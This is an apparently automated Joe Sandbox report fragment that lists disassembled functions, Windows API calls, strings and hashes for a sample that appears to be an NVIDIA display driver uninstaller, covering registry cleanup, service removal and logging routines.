                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • _sprintf.LIBCMT ref: 0040649D
                                  • _sprintf.LIBCMT ref: 004064E3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs_sprintf$DebugFormatLocalMutexObjectOutputReleaseSingleStringWait_fprintf
                                  • String ID: %0.2X$UninstCommandClass::GUIDToStr${%0lX-%0X-%0X-
                                  • API String ID: 676372913-759934890
                                  • Opcode ID: 5e835ca5cbbf2569a85a661860055239596436e0ac1670972b3e654356a5c8a3
                                  • Instruction ID: 2e905d4d7dcdac5bc4143f1a39e6cb48b85f65bbdfc4a122e570a6bb7480fca4
                                  • Opcode Fuzzy Hash: 5e835ca5cbbf2569a85a661860055239596436e0ac1670972b3e654356a5c8a3
                                  • Instruction Fuzzy Hash: 012137725042415BC7105F68AC516B7B796DE92328736433FFDA6673C2D63AAC24C3AC
                                  Function 00407E60 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 70COMMON
                                  Download Yara Rule
                                  Strings
                                  • UninstCommandClass::GetSpecialFolderPath, xrefs: 00407E7D
                                  • Folder ID must be a number passed value is (%s), xrefs: 00407ED7
                                  • GetSpecialFolderPath: invalid number of arguments, xrefs: 00407E9F
                                  • GetFolderPath, xrefs: 00407EDC
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$DebugFormatLocalMutexObjectOutputReleaseSingleStringWait_fprintf_sprintf
                                  • String ID: Folder ID must be a number passed value is (%s)$GetFolderPath$GetSpecialFolderPath: invalid number of arguments$UninstCommandClass::GetSpecialFolderPath
                                  • API String ID: 4132451974-1103180239
                                  • Opcode ID: 69c087b60a96538081e65396382519f9bd3f4d14d01f0391518ab4d1f502404b
                                  • Instruction ID: 98344a550c3f1d2e02586544355ede8bac48abb1df5af9f5f13b09efcfbe4250
                                  • Opcode Fuzzy Hash: 69c087b60a96538081e65396382519f9bd3f4d14d01f0391518ab4d1f502404b
                                  • Instruction Fuzzy Hash: BE110D766046016BC224E7269C42EEBB7EDAFD4704F10083FF655A32C1DA7CA90586EB
                                  Function 004072F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69windowCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • SendMessageA.USER32(?,0000100C,000000FF,00000000), ref: 00407335
                                  • SendMessageA.USER32 ref: 00407360
                                    • Part of subcall function 0040BBAC: __mbsicmp_l.LIBCMT ref: 0040BBB6
                                  • SendMessageA.USER32(?,0000100C,00000000,00000000), ref: 0040738C
                                  Strings
                                  • NVIDIA Display Driver, xrefs: 00407366
                                  • UninstCommandClass::EnableExceptDisplay, xrefs: 0040730F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: MessageSend$Time_fputs$DebugFormatLocalMutexObjectOutputReleaseSingleStringWait__mbsicmp_l_fprintf
                                  • String ID: NVIDIA Display Driver$UninstCommandClass::EnableExceptDisplay
                                  • API String ID: 3928693847-3706283040
                                  • Opcode ID: 8e3d865a6469777ae337fc8364dceadb80b04b6c412e871434ca39fdb96a2c11
                                  • Instruction ID: 3e1e3f1637bed6b7cc39a8541ded08aedb031c5aa89c23cf69578d1c725507dd
                                  • Opcode Fuzzy Hash: 8e3d865a6469777ae337fc8364dceadb80b04b6c412e871434ca39fdb96a2c11
                                  • Instruction Fuzzy Hash: 7B11DA71909340ABE320DB658C42DABB7D4AB95754F440A3EFD94632C0D678AC08C79B
                                  Function 00404580 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60registryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • RegOpenKeyExA.ADVAPI32 ref: 004045B8
                                  • RegQueryInfoKeyA.ADVAPI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 004045E1
                                  • RegCloseKey.ADVAPI32(0002001F), ref: 004045F0
                                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 00404606
                                  Strings
                                  • UninstCommandClass::NvRegRemoveKeyIfEmpty, xrefs: 00404585
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$CloseDebugDeleteFormatInfoLocalMutexObjectOpenOutputQueryReleaseSingleStringWait_fprintf
                                  • String ID: UninstCommandClass::NvRegRemoveKeyIfEmpty
                                  • API String ID: 3566116534-2089235062
                                  • Opcode ID: 68020ba293eed50de46f76348e23b9e4e697fb7792daca2952bc9b2894aaa1f4
                                  • Instruction ID: 8eee30311fe03f74eb95b9bd4fa7b60a7c74b25d7393c296749a61c0ca31c4b8
                                  • Opcode Fuzzy Hash: 68020ba293eed50de46f76348e23b9e4e697fb7792daca2952bc9b2894aaa1f4
                                  • Instruction Fuzzy Hash: BA1156B1144300AFE310DB15DC45FAB7BACFBD9B14F044A2DF549E6190E378E944CAAA
                                  Function 00404EB7 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • _sprintf.LIBCMT ref: 00404EE7
                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103), ref: 00404F58
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Close_sprintf
                                  • String ID: %s\%s$Placing back the original Class Path$Properties
                                  • API String ID: 3634278766-2160997917
                                  • Opcode ID: 1ebdbb81c0a5d4b7b385977134cc295c1fc9e1e42d64f4df2b807f66aa11630b
                                  • Instruction ID: bee4e6ae3ea7e864c5e5c21809e69de24ebffe46b1331da2e14c7458f7808734
                                  • Opcode Fuzzy Hash: 1ebdbb81c0a5d4b7b385977134cc295c1fc9e1e42d64f4df2b807f66aa11630b
                                  • Instruction Fuzzy Hash: 8911C4B26083419BC610A754AC12BABF7D8ABD4309F14487FF58593282EA3DD409879B
                                  Function 004049E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 53COMMON
                                  Download Yara Rule
                                  APIs
                                  • _memset.LIBCMT ref: 00404A10
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • _sprintf.LIBCMT ref: 00404A60
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$DebugFormatLocalMutexObjectOutputReleaseSingleStringWait_fprintf_memset_sprintf
                                  • String ID: Executing:%s$UninstCommandClass::DeleteRegNames(%s)$delreg HKLM\%s\%s
                                  • API String ID: 3581153556-370052421
                                  • Opcode ID: d306d72c957e660b376a7753cafe4cfc95fc4df6761db387eb4763c780d9694f
                                  • Instruction ID: a61b85e0747261848b00d8e638de1597da01825fec84e2fb2db2ad510b581516
                                  • Opcode Fuzzy Hash: d306d72c957e660b376a7753cafe4cfc95fc4df6761db387eb4763c780d9694f
                                  • Instruction Fuzzy Hash: C5110AB1604700ABD230EB58DC46FEF77E8AB95719F40052EF589621C2DBB85584CB9A
                                  Function 0040E4E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0040EF94: __amsg_exit.LIBCMT ref: 0040EFA2
                                  • __amsg_exit.LIBCMT ref: 0040E50C
                                  • __lock.LIBCMT ref: 0040E51C
                                  • InterlockedDecrement.KERNEL32(?), ref: 0040E539
                                  • InterlockedIncrement.KERNEL32(03481670), ref: 0040E564
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__lock
                                  • String ID: SB
                                  • API String ID: 4129207761-3983915703
                                  • Opcode ID: 1a08993372731d4c8246d2f10deb2785e331fc6e6e05f8f2c6f956f92c6674cc
                                  • Instruction ID: 605de388b28e7a62b9b540a620c15a21e5709b712932abf0c8029bb6e7a053d5
                                  • Opcode Fuzzy Hash: 1a08993372731d4c8246d2f10deb2785e331fc6e6e05f8f2c6f956f92c6674cc
                                  • Instruction Fuzzy Hash: 56017075A01611FBCB21BBA69C0579A77A0BB00758F40887AF810772D1D77C5962CBDD
                                  Function 00408C10 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46serviceCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00408C2C
                                  • OpenServiceA.ADVAPI32(00000000,?,80000000), ref: 00408C4B
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 00408C61
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 00408C68
                                  Strings
                                  • UninstCommandClass::NvUninstallNvSvc, xrefs: 00408C12
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Service$CloseHandleOpenTime_fputs$DebugFormatLocalManagerMutexObjectOutputReleaseSingleStringWait_fprintf
                                  • String ID: UninstCommandClass::NvUninstallNvSvc
                                  • API String ID: 2625296822-1026150982
                                  • Opcode ID: e68b278362d47b4283fecc65c103a245f1dc282bd71e7ee9102529209b5a5425
                                  • Instruction ID: 942a79ec500fcabc5220d1ceccf93b4879784c7cf1ed6b9a4c2c750fd2de6961
                                  • Opcode Fuzzy Hash: e68b278362d47b4283fecc65c103a245f1dc282bd71e7ee9102529209b5a5425
                                  • Instruction Fuzzy Hash: D3F04C333013043BE2309615AC48F6B7B5CDB84765F21003EF70962281CF39E80082BD
                                  Function 00407690 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 46windowCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • LoadBitmapA.USER32(?,00000074), ref: 004076BA
                                  • CreateWindowExA.USER32(00000200,STATIC,0041B8A5,8040000E,0000012C,0000012C,0000012C,0000012C,?,00000000,?,00000000), ref: 004076F6
                                  • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 00407707
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$BitmapCreateDebugFormatLoadLocalMessageMutexObjectOutputReleaseSendSingleStringWaitWindow_fprintf
                                  • String ID: STATIC$UninstCommandClass::CreateLogoWindow
                                  • API String ID: 2280148361-2848316750
                                  • Opcode ID: e3f30fae9201d59de7f15c6bdd293f321593527e35c2c602b720e45051410e66
                                  • Instruction ID: 3546a840c523e212432b745e337889ee06d1936c0ab3b2ca76b08a20a14f1f5d
                                  • Opcode Fuzzy Hash: e3f30fae9201d59de7f15c6bdd293f321593527e35c2c602b720e45051410e66
                                  • Instruction Fuzzy Hash: 98018171380704BBF220A7789C4AFABB799EB48F15F10442AFB15BA1D1D6B86C1086D9
                                  Function 00409889 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • _sprintf.LIBCMT ref: 004098AA
                                    • Part of subcall function 0040BBAC: __mbsicmp_l.LIBCMT ref: 0040BBB6
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 004098E4
                                  • FindClose.KERNEL32(00000000), ref: 004098F8
                                    • Part of subcall function 00407FC0: GetPrivateProfileStringA.KERNEL32(Version,Class,(error),?,00000080,?), ref: 0040800A
                                    • Part of subcall function 00407FC0: GetPrivateProfileStringA.KERNEL32(Version,Provider,(error),?,00000080,?), ref: 00408029
                                  • FindClose.KERNEL32(00000000), ref: 0040992C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
